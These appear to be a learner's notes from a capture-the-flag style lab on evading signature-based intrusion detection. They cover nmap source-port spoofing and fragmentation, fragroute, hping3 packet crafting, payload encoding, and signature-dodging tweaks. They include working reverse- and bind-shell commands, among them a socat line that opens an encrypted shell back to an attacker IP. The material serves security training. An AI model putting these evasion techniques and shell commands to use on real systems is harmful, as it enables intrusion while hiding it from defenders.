Evading a signature-based IDS/IPS requires that manipulating traffic so it does not match any recognized signatures.

This will be an overview on the two following methods:

Evasion via Protocol Manipulation Evasion via Payload Manipulation Evasion via Protocol Manipulation ∙ Relying on a different protocol

Netcat

• UDP instead of TCP // HTTP instead of DNS to deliver an attack or exfiltrating data
• nc -lvnp 25 will appear to be TCP connection with SMTP // nc -ulvnp 162 gives the illusion of UDP connection with SNMP server
• this is given the IDS/IPS doesn't support deep packet inspection (DPI) ∙ Manipulating (source) TCP/UDP port

Nmap

• Using the '-g' $ or '-source-port $' options will make nmap send all its traffic through a specifc port.
• While scanning a target use 'nmap -sS -Pn -g 80 -F 10.10.175.234' to make the port scan appear to be exchanged with an HTTP server at first glance
• For scanning UDP ports try 'nmap -sU -Pn -g 53 -F 10.10.175.234' to make the traffic appear to be exchanged with a DNS server

Ncat

• DNS camo
• (local!)> nc -ulvnp 53
• (remote)> nc -u $ 53
• HTTP server camo**
• (local!)> nc -ulvnp 80
• (remote)> nc -u $ 80 ∙ Using session splicing (IP packet fragmentation) The assumption is that if you break the packet(s) related to an attack into smaller packets, you will avoid matching the IDS signatures. If the IDS is looking for a particular stream of bytes to detect the malicious payload, divide your payload among multiple packets. Unless the IDS reassembles the packets, the rule won't be triggered.

Nmap

• Try '-f' to set the dat in the IP packet to 8 bytes
• Try '-ff' to limit the data in the IP packet to 16 bytes at most
• Try '-mtu $SIZE' to provide a custom size for data carried wihin the IP packet (Needs to be a multiple of 8)

Fragroute (force all packets to be fragmented into specific sizes)

• Make a config file with 'ip_frag $SIZE' to fragment the IP data according to the provided size (Again, multiple of 8)
• Run the command with 'fragroute -f fragroute.conf $HOST'. The host is the destination where we would send the packets to.

∙ Sending invalid packets

Generally speaking, the response of systems to valid packets tends to be predictable. However, it can be unclear how systems would respond to invalid packets. For instance, an IDS/IPS might process an invalid packet, while the target system might ignore it. The exact behavior would require some experimentation or inside knowledge. Nmap lets you send packets with a wrong TCP/UDP checksum using the option --badsum. An incorrect checksum indicates that the original packet has been altered somewhere across its path from the sending program.

Nmap also lets you send packets with custom TCP flags, including invalid ones. The option --scanflags lets you choose which flags you want to set.

URG for Urgent ACK for Acknowledge PSH for Push RST for Reset SYN for Synchronize FIN for Finish ## hping3 (custom packet crafting) -t or -ttl to set the TIme to Live in the IP header -b or -badsum to send packets with a bad UDP/TCP checksum -S, -A, -P, -U, -F, -R to set the TCP SYN, ACK, PUSH, URG, FIN, and RST flags, respectively. Evasion via Payload Manipulation Obfuscating and encoding the payload Encoding to base64 URL encoding Using Escaped Unicode https://icyberchef.com/ Drag 'escapted unicode characters to recipe column' Put checkmark near 'Encode all chars' with a prefix of \u

• Put checkmark nead 'Uppercase hex' with a padding of 4 Encrypting the communication channel Because an IDS/IPS won't inspect encrypted data, an attacker can take advantage of encryption to evade detection. Unlike encoding, encryption requires an encryption key. ##socat
• We can use so cat to use an encryption key as it listens for incoming connections. An encrypted reverese shell can be carried out in three steps.

1. Generate the key
2. Listen on the attacker's machine
3. Connect to the attacker's machine Generating the key We can generate the key using the following command: openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt The arguments in the above command are: req indicates that this is a certificate signing request. Obviously, we won't submit our certificate for signing. -x509 specifies that we want an X.509 certificate -newkey rsa:4096 creates a new certificate request and a new private key using RSA, with the key size being 4096 bits. (You can use other options for RSA key size, such as -newkey rsa:2048.) -days 365 shows that the validity of our certificate will be one year -subj sets data, such as organization and country, via the command-line. -nodes simplifies our command and does not encrypt the private key -keyout PRIVATE_KEY specifies the filename where we want to save our private key -out CERTIFICATE specifies the filename to which we want to write the certificate request This returnes a private key and a certificate

• The privacy Enchanced Mail (PEM) file requires the concatenation of the private key + the certficate. We can use cat to create our PEM file: cat xxx-reverse.key xxx-reverse.crt > xxx-reverse.pem Listening Now with the PEM ready we can listen using the key with the following command

socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT

• The options that we used are:

-d -d provides some debugging data (fatal, error, warning, and notice messages) OPENSSL-LISTEN:PORT_NUM indicates that the connection will be encrypted using OPENSSL cert=PEM_FILE provides the PEM file (certificate and private key) to establish the encrypted connection verify=0 disables checking peer's certificate fork creates a sub-process to handle each new connection. Connecting On the victim system use the following command

• socat OPENSSL:10.20.30.1:4443,verify=0 EXEC:/bin/bash (using EXEC invokes the specified program) Modifying the shellcode Consider the simple case where you want to use Ncat to create a bind shell. The following command ncat -lvnp 1234 -e /bin/bash tells ncat to listen on TCP port 1234 and bind Bash shell to it. If you want to detect packets containing such commands, you need to think of something specific to match the signature but not too specific. Scanning for ncat -lvnp can be easily evaded by changing the order of the flags. On the other hand, inspecting the payload for ncat - can be evaded by adding an extra white space, such as ncat  - which would still run correctly on the target system. If the IDS is looking for ncat, then simple changes to the original command won't evade detection. We need to consider more sophisticated approaches depending on the target system/application. One option would be to use a different command such as nc or socat. Alternatively, you can consider a different encoding if the target system can process it properly.